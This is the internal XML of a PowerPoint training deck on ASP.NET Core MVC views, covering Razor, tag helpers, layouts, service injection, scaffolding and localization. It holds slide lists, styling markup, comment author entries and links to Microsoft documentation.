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2" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId100"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId101"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="458" r:id="rId6"/>
    <p:sldId id="564" r:id="rId7"/>
    <p:sldId id="460" r:id="rId8"/>
    <p:sldId id="461" r:id="rId9"/>
    <p:sldId id="462" r:id="rId10"/>
    <p:sldId id="463" r:id="rId11"/>
    <p:sldId id="464" r:id="rId12"/>
    <p:sldId id="465" r:id="rId13"/>
    <p:sldId id="466" r:id="rId14"/>
    <p:sldId id="599" r:id="rId15"/>
    <p:sldId id="600" r:id="rId16"/>
    <p:sldId id="604" r:id="rId17"/>
    <p:sldId id="601" r:id="rId18"/>
    <p:sldId id="602" r:id="rId19"/>
    <p:sldId id="603" r:id="rId20"/>
    <p:sldId id="572" r:id="rId21"/>
    <p:sldId id="573" r:id="rId22"/>
    <p:sldId id="574" r:id="rId23"/>
    <p:sldId id="575" r:id="rId24"/>
    <p:sldId id="598" r:id="rId25"/>
    <p:sldId id="576" r:id="rId26"/>
    <p:sldId id="577" r:id="rId27"/>
    <p:sldId id="578" r:id="rId28"/>
    <p:sldId id="527" r:id="rId29"/>
    <p:sldId id="528" r:id="rId30"/>
    <p:sldId id="529" r:id="rId31"/>
    <p:sldId id="530" r:id="rId32"/>
    <p:sldId id="531" r:id="rId33"/>
    <p:sldId id="532" r:id="rId34"/>
    <p:sldId id="487" r:id="rId35"/>
    <p:sldId id="475" r:id="rId36"/>
    <p:sldId id="488" r:id="rId37"/>
    <p:sldId id="489" r:id="rId38"/>
    <p:sldId id="490" r:id="rId39"/>
    <p:sldId id="491" r:id="rId40"/>
    <p:sldId id="492" r:id="rId41"/>
    <p:sldId id="493" r:id="rId42"/>
    <p:sldId id="494" r:id="rId43"/>
    <p:sldId id="495" r:id="rId44"/>
    <p:sldId id="496" r:id="rId45"/>
    <p:sldId id="497" r:id="rId46"/>
    <p:sldId id="584" r:id="rId47"/>
    <p:sldId id="499" r:id="rId48"/>
    <p:sldId id="500" r:id="rId49"/>
    <p:sldId id="501" r:id="rId50"/>
    <p:sldId id="502" r:id="rId51"/>
    <p:sldId id="503" r:id="rId52"/>
    <p:sldId id="556" r:id="rId53"/>
    <p:sldId id="504" r:id="rId54"/>
    <p:sldId id="580" r:id="rId55"/>
    <p:sldId id="505" r:id="rId56"/>
    <p:sldId id="508" r:id="rId57"/>
    <p:sldId id="509" r:id="rId58"/>
    <p:sldId id="510" r:id="rId59"/>
    <p:sldId id="511" r:id="rId60"/>
    <p:sldId id="512" r:id="rId61"/>
    <p:sldId id="513" r:id="rId62"/>
    <p:sldId id="521" r:id="rId63"/>
    <p:sldId id="522" r:id="rId64"/>
    <p:sldId id="579" r:id="rId65"/>
    <p:sldId id="523" r:id="rId66"/>
    <p:sldId id="555" r:id="rId67"/>
    <p:sldId id="553" r:id="rId68"/>
    <p:sldId id="524" r:id="rId69"/>
    <p:sldId id="525" r:id="rId70"/>
    <p:sldId id="568" r:id="rId71"/>
    <p:sldId id="569" r:id="rId72"/>
    <p:sldId id="570" r:id="rId73"/>
    <p:sldId id="571" r:id="rId74"/>
    <p:sldId id="565" r:id="rId75"/>
    <p:sldId id="566" r:id="rId76"/>
    <p:sldId id="554" r:id="rId77"/>
    <p:sldId id="526" r:id="rId78"/>
    <p:sldId id="557" r:id="rId79"/>
    <p:sldId id="558" r:id="rId80"/>
    <p:sldId id="563" r:id="rId81"/>
    <p:sldId id="562" r:id="rId82"/>
    <p:sldId id="605" r:id="rId83"/>
    <p:sldId id="533" r:id="rId84"/>
    <p:sldId id="534" r:id="rId85"/>
    <p:sldId id="535" r:id="rId86"/>
    <p:sldId id="536" r:id="rId87"/>
    <p:sldId id="537" r:id="rId88"/>
    <p:sldId id="538" r:id="rId89"/>
    <p:sldId id="585" r:id="rId90"/>
    <p:sldId id="587" r:id="rId91"/>
    <p:sldId id="588" r:id="rId92"/>
    <p:sldId id="590" r:id="rId93"/>
    <p:sldId id="589" r:id="rId94"/>
    <p:sldId id="591" r:id="rId95"/>
    <p:sldId id="586" r:id="rId96"/>
    <p:sldId id="455" r:id="rId97"/>
    <p:sldId id="456" r:id="rId98"/>
    <p:sldId id="457" r:id="rId99"/>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Segoe UI" panose="020B05020402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Segoe UI" panose="020B05020402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Segoe UI" panose="020B05020402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Segoe UI" panose="020B05020402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Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl9pPr>
  </p:defaultTextStyle>
  <p:extLst>
    <p:ext uri="{521415D9-36F7-43E2-AB2F-B90AF26B5E84}">
      <p14:sectionLst xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
        <p14:section name="Intro" id="{8F49CBFC-DAFD-4AAA-836B-00E724140E79}">
          <p14:sldIdLst>
            <p14:sldId id="458"/>
            <p14:sldId id="564"/>
            <p14:sldId id="460"/>
            <p14:sldId id="461"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="View Fundamentals" id="{9EDD34EC-D7D1-43B0-ACB7-0A735E8FDC04}">
          <p14:sldIdLst>
            <p14:sldId id="462"/>
            <p14:sldId id="463"/>
            <p14:sldId id="464"/>
            <p14:sldId id="465"/>
            <p14:sldId id="466"/>
            <p14:sldId id="599"/>
            <p14:sldId id="600"/>
            <p14:sldId id="604"/>
            <p14:sldId id="601"/>
            <p14:sldId id="602"/>
            <p14:sldId id="603"/>
            <p14:sldId id="572"/>
            <p14:sldId id="573"/>
            <p14:sldId id="574"/>
            <p14:sldId id="575"/>
            <p14:sldId id="598"/>
            <p14:sldId id="576"/>
            <p14:sldId id="577"/>
            <p14:sldId id="578"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="View Components" id="{D6A05D83-B138-4C51-9195-D3DFE6166305}">
          <p14:sldIdLst>
            <p14:sldId id="527"/>
            <p14:sldId id="528"/>
            <p14:sldId id="529"/>
            <p14:sldId id="530"/>
            <p14:sldId id="531"/>
            <p14:sldId id="532"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Razor View Engine" id="{83756B25-6424-4723-B71D-3584C28A095B}">
          <p14:sldIdLst>
            <p14:sldId id="487"/>
            <p14:sldId id="475"/>
            <p14:sldId id="488"/>
            <p14:sldId id="489"/>
            <p14:sldId id="490"/>
            <p14:sldId id="491"/>
            <p14:sldId id="492"/>
            <p14:sldId id="493"/>
            <p14:sldId id="494"/>
            <p14:sldId id="495"/>
            <p14:sldId id="496"/>
            <p14:sldId id="497"/>
            <p14:sldId id="584"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Layouts &amp; Sections" id="{D44ADE75-E634-4F5A-B809-E023074669DF}">
          <p14:sldIdLst>
            <p14:sldId id="499"/>
            <p14:sldId id="500"/>
            <p14:sldId id="501"/>
            <p14:sldId id="502"/>
            <p14:sldId id="503"/>
            <p14:sldId id="556"/>
            <p14:sldId id="504"/>
            <p14:sldId id="580"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="HTML Helpers" id="{08617CAE-1394-4D6B-873B-AC760228C205}">
          <p14:sldIdLst>
            <p14:sldId id="505"/>
            <p14:sldId id="508"/>
            <p14:sldId id="509"/>
            <p14:sldId id="510"/>
            <p14:sldId id="511"/>
            <p14:sldId id="512"/>
            <p14:sldId id="513"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Tag Helpers [New]" id="{906C422D-D54F-4E85-8524-5BC6F8252487}">
          <p14:sldIdLst>
            <p14:sldId id="521"/>
            <p14:sldId id="522"/>
            <p14:sldId id="579"/>
            <p14:sldId id="523"/>
            <p14:sldId id="555"/>
            <p14:sldId id="553"/>
            <p14:sldId id="524"/>
            <p14:sldId id="525"/>
            <p14:sldId id="568"/>
            <p14:sldId id="569"/>
            <p14:sldId id="570"/>
            <p14:sldId id="571"/>
            <p14:sldId id="565"/>
            <p14:sldId id="566"/>
            <p14:sldId id="554"/>
            <p14:sldId id="526"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Service Injection" id="{54DF08F2-2574-4EBB-84FB-D14B09A246F5}">
          <p14:sldIdLst>
            <p14:sldId id="557"/>
            <p14:sldId id="558"/>
            <p14:sldId id="563"/>
            <p14:sldId id="562"/>
            <p14:sldId id="605"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Scaffolding" id="{C2C8D1E9-E387-41BF-81E7-A031B06A7CB8}">
          <p14:sldIdLst>
            <p14:sldId id="533"/>
            <p14:sldId id="534"/>
            <p14:sldId id="535"/>
            <p14:sldId id="536"/>
            <p14:sldId id="537"/>
            <p14:sldId id="538"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Localization [Optional]" id="{D74F1B22-881D-4C6A-B103-BD21EC4B84EB}">
          <p14:sldIdLst>
            <p14:sldId id="585"/>
            <p14:sldId id="587"/>
            <p14:sldId id="588"/>
            <p14:sldId id="590"/>
            <p14:sldId id="589"/>
            <p14:sldId id="591"/>
            <p14:sldId id="586"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Summary" id="{3F82A83F-A5DF-488E-9CBD-163AF1F7B147}">
          <p14:sldIdLst>
            <p14:sldId id="455"/>
            <p14:sldId id="456"/>
            <p14:sldId id="45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oun Ngo" initials="SN" lastIdx="3" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-124525095-708259637-1543119021-1155679" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Waqar Aziz" initials="WA" lastIdx="3" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-124525095-708259637-1543119021-1127879" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="3" name="Deepankar Panda (Spectrum Consultants India Pvt)" initials="DP(CIP" lastIdx="5" clrIdx="2">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-2146773085-903363285-719344707-15024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a:srgbClr val="15AEEF"/>
    <a:srgbClr val="898989"/>
    <a:srgbClr val="A31515"/>
    <a:srgbClr val="89D6F7"/>
    <a:srgbClr val="FF9933"/>
    <a:srgbClr val="FF9966"/>
    <a:srgbClr val="FF3300"/>
    <a:srgbClr val="CCFF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72" autoAdjust="0"/>
    <p:restoredTop sz="69881" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="79" d="100"/>
          <a:sy n="79" d="100"/>
        </p:scale>
        <p:origin x="1494" y="96"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="76" d="100"/>
          <a:sy n="76" d="100"/>
        </p:scale>
        <p:origin x="2754" y="2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commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.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tableStyles" Target="tableStyle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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId105"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Segoe UI Light"/>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Segoe UI Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{67EBB54C-BCCA-4DFA-AF4F-21F8BA472C14}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/1/2020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Segoe UI Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>© 2014 Microsoft Corporation</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Segoe UI Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AEEEF8C6-BBC7-4C6F-B7D8-D259C55EAE1E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358873043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4048" y="484632"/>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4048" y="3913632"/>
            <a:ext cx="6099048" cy="4773168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171442" marR="0" lvl="0" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="116000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="105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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344470" marR="0" lvl="1" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="105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Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515914" marR="0" lvl="2" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="105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Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="688940" marR="0" lvl="3" indent="-171442" algn="l" defTabSz="914354"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Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857208" marR="0" lvl="4" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="105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Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5429249" y="8685213"/>
            <a:ext cx="1427163" cy="458787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1050">
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1489DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9525" y="8868011"/>
            <a:ext cx="4844956" cy="415498"/>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a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© 2016 Microsoft Corporation                                 Microsoft Confidential </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2093516017"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf hdr="0" dt="0"/>
  <p:notesStyle>
    <a:lvl1pPr marL="171442" marR="0" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
      <a:lnSpc>
        <a:spcPct val="114000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzPct val="116000"/>
      <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
      <a:buChar char="•"/>
      <a:tabLst/>
      <a:defRPr sz="1050" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="344470" marR="0" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
      <a:lnSpc>
        <a:spcPct val="114000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
      <a:buChar char="o"/>
      <a:tabLst/>
      <a:defRPr sz="1050" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="515914" marR="0" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
      <a:lnSpc>
        <a:spcPct val="114000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
      <a:buChar char="§"/>
      <a:tabLst/>
      <a:defRPr sz="1050" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="688940" marR="0" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
      <a:lnSpc>
        <a:spcPct val="114000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
      <a:buChar char="•"/>
      <a:tabLst/>
      <a:defRPr sz="1050" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="857208" marR="0" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
      <a:lnSpc>
        <a:spcPct val="114000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
      <a:buChar char="o"/>
      <a:tabLst/>
      <a:defRPr sz="1050" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Segoe UI" panose="020B0502040204020203"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aspnet/core/razor-pages/?view=aspnetcore-3.1&amp;tabs=visual-studio"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msdn.microsoft.com/en-us/library/ms972429.aspx"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rachelappel.com/razor/partial-views-in-asp-net-mvc-3-w-the-razor-view-engine/"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microsoft.com/en-us/aspnet/core/mvc/views/view-components?view=aspnetcore-3.1"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exceptionnotfound.net/asp-net-mvc-demystified-display-and-editor-templates/"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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/aspnet/core/mvc/views/tag-helpers/intro?view=aspnetcore-3.1#managing-tag-helper-scope" TargetMode="External"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/aspnet/core/mvc/views/dependency-injection?view=aspnetcore-3.1" TargetMode="External"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/56042058/is-it-possible-to-change-cshtml-view-and-see-the-changes-instantly-using-net-c" TargetMode="External"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.asp.net/en/latest/fundamentals/localization.html#view-localization" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide85.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.asp.net/en/latest/fundamentals/localization.html#resource-file-naming" TargetMode="External"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide85.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.asp.net/projects/api/en/latest/autoapi/Microsoft/AspNetCore/Mvc/Localization/IViewLocalizer/index.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide86.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.asp.net/projects/api/en/latest/autoapi/Microsoft/AspNetCore/Mvc/Localization/ViewLocalizer/index.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.asp.net/projects/mvc/en/latest/views/index.html" TargetMode="Externa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3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{675416BA-65F7-274A-AD61-D0FA78F3AA6E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
